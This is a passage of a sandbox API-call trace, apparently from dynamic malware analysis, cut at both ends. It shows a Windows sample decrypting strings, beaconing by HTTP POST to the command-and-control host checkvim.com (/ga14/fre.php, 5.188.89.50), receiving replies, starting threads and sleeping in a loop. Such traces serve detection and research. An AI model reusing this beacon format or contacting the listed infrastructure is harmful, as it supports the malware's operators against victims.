pbData=0x418960, dwFlags=0x0) returned 1 [0312.061] GetProcessHeap () returned 0x840000 [0312.061] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0312.062] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0312.062] CryptDecrypt (in: hKey=0x87e7b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fa28, pdwDataLen=0x19f9a4 | out: pbData=0x87fa28, pdwDataLen=0x19f9a4) returned 1 [0312.066] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0312.066] CryptDestroyKey (hKey=0x87e7b0) returned 1 [0312.067] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0312.067] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0312.067] GetProcessHeap () returned 0x840000 [0312.067] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0312.068] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0312.068] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0312.069] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0312.069] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0312.070] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0312.070] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0312.070] GetProcessHeap () returned 0x840000 [0312.070] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8713a8 [0312.070] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871470*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878ba8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0312.071] GetProcessHeap () returned 0x840000 [0312.071] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c08 [0312.071] socket (af=2, type=1, protocol=6) returned 0x534 [0312.071] connect (s=0x534, name=0x878ba8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0312.138] FreeAddrInfoW (pAddrInfo=0x871470*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878ba8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0312.138] GetProcessHeap () returned 0x840000 [0312.138] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f8a8 [0312.138] GetProcessHeap () returned 0x840000 [0312.138] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8865c0 [0312.139] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0312.140] wvsprintfA (in: param_1=0x8865c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0312.140] GetProcessHeap () returned 0x840000 [0312.140] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0312.140] GetProcessHeap () returned 0x840000 [0312.140] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8865c0 | out: hHeap=0x840000) returned 1 [0312.140] GetProcessHeap () returned 0x840000 [0312.140] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fea8 [0312.140] GetProcessHeap () returned 0x840000 [0312.140] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8865c0 [0312.141] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0312.141] wvsprintfA (in: param_1=0x8865c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0312.141] GetProcessHeap () returned 0x840000 [0312.141] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0312.141] GetProcessHeap () returned 0x840000 [0312.141] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8865c0 | out: hHeap=0x840000) returned 1 [0312.141] send (s=0x534, buf=0x873a58*, len=237, flags=0) returned 237 [0312.142] send (s=0x534, buf=0x87eb58*, len=159, flags=0) returned 159 [0312.142] GetProcessHeap () returned 0x840000 [0312.142] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0312.142] recv (in: s=0x534, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0312.514] GetProcessHeap () returned 0x840000 [0312.514] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0312.514] GetProcessHeap () returned 0x840000 [0312.514] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fea8 | out: hHeap=0x840000) returned 1 [0312.514] GetProcessHeap () returned 0x840000 [0312.514] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0312.514] GetProcessHeap () returned 0x840000 [0312.514] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f8a8 | out: hHeap=0x840000) returned 1 [0312.514] closesocket (s=0x534) returned 0 [0312.539] GetProcessHeap () returned 0x840000 [0312.539] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c08 | out: hHeap=0x840000) returned 1 [0312.539] GetProcessHeap () returned 0x840000 [0312.539] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0312.539] GetProcessHeap () returned 0x840000 [0312.539] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fa28 | out: hHeap=0x840000) returned 1 [0312.539] GetProcessHeap () returned 0x840000 [0312.539] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8713a8 | out: hHeap=0x840000) returned 1 [0312.542] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0xe3c) returned 0x534 [0312.564] Sleep (dwMilliseconds=0xea60) [0312.568] GetProcessHeap () returned 0x840000 [0312.568] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fe18 [0312.569] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0312.569] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0312.614] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0312.614] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f8a8) returned 1 [0312.622] GetProcessHeap () returned 0x840000 [0312.622] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708d8 [0312.623] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0312.623] CryptImportKey (in: hProv=0x86f8a8, pbData=0x8708d8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e3b0) returned 1 [0312.624] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0312.624] CryptSetKeyParam (hKey=0x87e3b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0312.624] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0312.625] CryptSetKeyParam (hKey=0x87e3b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0312.625] GetProcessHeap () returned 0x840000 [0312.625] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708d8 | out: hHeap=0x840000) returned 1 [0312.625] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0312.625] CryptDecrypt (in: hKey=0x87e3b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fe18, pdwDataLen=0x19f9a4 | out: pbData=0x87fe18, pdwDataLen=0x19f9a4) returned 1 [0312.626] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0312.626] CryptDestroyKey (hKey=0x87e3b0) returned 1 [0312.627] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0312.627] CryptReleaseContext (hProv=0x86f8a8, dwFlags=0x0) returned 1 [0312.627] GetProcessHeap () returned 0x840000 [0312.627] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0312.628] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0312.628] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0312.628] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0312.629] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0312.629] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0312.630] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0312.630] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0312.631] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0312.631] GetProcessHeap () returned 0x840000 [0312.631] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871128 [0312.631] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0312.631] GetProcessHeap () returned 0x840000 [0312.631] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871128 | out: hHeap=0x840000) returned 1 [0312.631] GetProcessHeap () returned 0x840000 [0312.631] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0312.631] GetProcessHeap () returned 0x840000 [0312.631] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fe18 | out: hHeap=0x840000) returned 1 [0312.631] GetProcessHeap () returned 0x840000 [0312.631] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f8c0 [0312.632] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0312.632] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0312.637] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0312.638] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fce8) returned 1 [0312.643] GetProcessHeap () returned 0x840000 [0312.643] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0312.644] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0312.644] CryptImportKey (in: hProv=0x86fce8, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e8f0) returned 1 [0312.644] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0312.645] CryptSetKeyParam (hKey=0x87e8f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0312.645] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0312.646] CryptSetKeyParam (hKey=0x87e8f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0312.646] GetProcessHeap () returned 0x840000 [0312.646] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0312.647] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0312.652] CryptDecrypt (in: hKey=0x87e8f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f8c0, pdwDataLen=0x19f9a4 | out: pbData=0x87f8c0, pdwDataLen=0x19f9a4) returned 1 [0312.653] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0312.653] CryptDestroyKey (hKey=0x87e8f0) returned 1 [0312.653] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0312.654] CryptReleaseContext (hProv=0x86fce8, dwFlags=0x0) returned 1 [0312.654] GetProcessHeap () returned 0x840000 [0312.654] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0312.654] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0312.655] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0312.655] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0312.656] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0312.656] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0312.657] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0312.657] GetProcessHeap () returned 0x840000 [0312.657] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871600 [0312.657] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871420*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0312.658] GetProcessHeap () returned 0x840000 [0312.659] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b18 [0312.659] socket (af=2, type=1, protocol=6) returned 0x538 [0312.659] connect (s=0x538, name=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0312.726] FreeAddrInfoW (pAddrInfo=0x871420*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0312.726] GetProcessHeap () returned 0x840000 [0312.726] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f688 [0312.726] GetProcessHeap () returned 0x840000 [0312.726] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8865c0 [0312.727] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0312.728] wvsprintfA (in: param_1=0x8865c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0312.728] GetProcessHeap () returned 0x840000 [0312.728] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0312.728] GetProcessHeap () returned 0x840000 [0312.728] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8865c0 | out: hHeap=0x840000) returned 1 [0312.728] GetProcessHeap () returned 0x840000 [0312.728] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f680 [0312.728] GetProcessHeap () returned 0x840000 [0312.728] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8865c0 [0312.729] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0312.730] wvsprintfA (in: param_1=0x8865c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0312.730] GetProcessHeap () returned 0x840000 [0312.730] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0312.730] GetProcessHeap () returned 0x840000 [0312.730] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8865c0 | out: hHeap=0x840000) returned 1 [0312.730] send (s=0x538, buf=0x873a58*, len=237, flags=0) returned 237 [0312.730] send (s=0x538, buf=0x87eb58*, len=159, flags=0) returned 159 [0312.731] GetProcessHeap () returned 0x840000 [0312.731] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0312.731] recv (in: s=0x538, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0313.110] GetProcessHeap () returned 0x840000 [0313.110] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0313.110] GetProcessHeap () returned 0x840000 [0313.110] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f680 | out: hHeap=0x840000) returned 1 [0313.110] GetProcessHeap () returned 0x840000 [0313.110] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0313.110] GetProcessHeap () returned 0x840000 [0313.110] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f688 | out: hHeap=0x840000) returned 1 [0313.110] closesocket (s=0x538) returned 0 [0313.133] GetProcessHeap () returned 0x840000 [0313.133] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b18 | out: hHeap=0x840000) returned 1 [0313.133] GetProcessHeap () returned 0x840000 [0313.133] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0313.133] GetProcessHeap () returned 0x840000 [0313.133] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f8c0 | out: hHeap=0x840000) returned 1 [0313.133] GetProcessHeap () returned 0x840000 [0313.133] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871600 | out: hHeap=0x840000) returned 1 [0313.133] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x6fc) returned 0x538 [0313.137] Sleep (dwMilliseconds=0xea60) [0313.194] GetProcessHeap () returned 0x840000 [0313.194] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f680 [0313.195] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0313.195] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0313.202] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0313.202] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fce8) returned 1 [0313.207] GetProcessHeap () returned 0x840000 [0313.207] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0313.208] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0313.208] CryptImportKey (in: hProv=0x86fce8, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e7b0) returned 1 [0313.209] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0313.209] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0313.209] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0313.210] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0313.210] GetProcessHeap () returned 0x840000 [0313.210] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0313.210] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0313.210] CryptDecrypt (in: hKey=0x87e7b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f680, pdwDataLen=0x19f9a4 | out: pbData=0x87f680, pdwDataLen=0x19f9a4) returned 1 [0313.214] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0313.214] CryptDestroyKey (hKey=0x87e7b0) returned 1 [0313.215] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0313.215] CryptReleaseContext (hProv=0x86fce8, dwFlags=0x0) returned 1 [0313.215] GetProcessHeap () returned 0x840000 [0313.215] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0313.222] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0313.222] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0313.223] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0313.223] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0313.224] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0313.224] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0313.224] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0313.225] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0313.225] GetProcessHeap () returned 0x840000 [0313.225] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871600 [0313.225] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0313.225] GetProcessHeap () returned 0x840000 [0313.225] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871600 | out: hHeap=0x840000) returned 1 [0313.225] GetProcessHeap () returned 0x840000 [0313.225] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0313.225] GetProcessHeap () returned 0x840000 [0313.225] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f680 | out: hHeap=0x840000) returned 1 [0313.225] GetProcessHeap () returned 0x840000 [0313.225] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fcf8 [0313.226] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0313.226] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0313.230] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0313.230] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f248) returned 1 [0313.235] GetProcessHeap () returned 0x840000 [0313.235] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0313.236] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0313.236] CryptImportKey (in: hProv=0x86f248, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e270) returned 1 [0313.237] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0313.237] CryptSetKeyParam (hKey=0x87e270, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0313.237] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0313.237] CryptSetKeyParam (hKey=0x87e270, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0313.238] GetProcessHeap () returned 0x840000 [0313.238] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0313.238] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0313.248] CryptDecrypt (in: hKey=0x87e270, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fcf8, pdwDataLen=0x19f9a4 | out: pbData=0x87fcf8, pdwDataLen=0x19f9a4) returned 1 [0313.249] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0313.249] CryptDestroyKey (hKey=0x87e270) returned 1 [0313.250] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0313.250] CryptReleaseContext (hProv=0x86f248, dwFlags=0x0) returned 1 [0313.250] GetProcessHeap () returned 0x840000 [0313.250] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0313.251] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0313.251] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0313.252] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0313.252] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0313.253] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0313.253] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0313.253] GetProcessHeap () returned 0x840000 [0313.253] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871600 [0313.253] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), 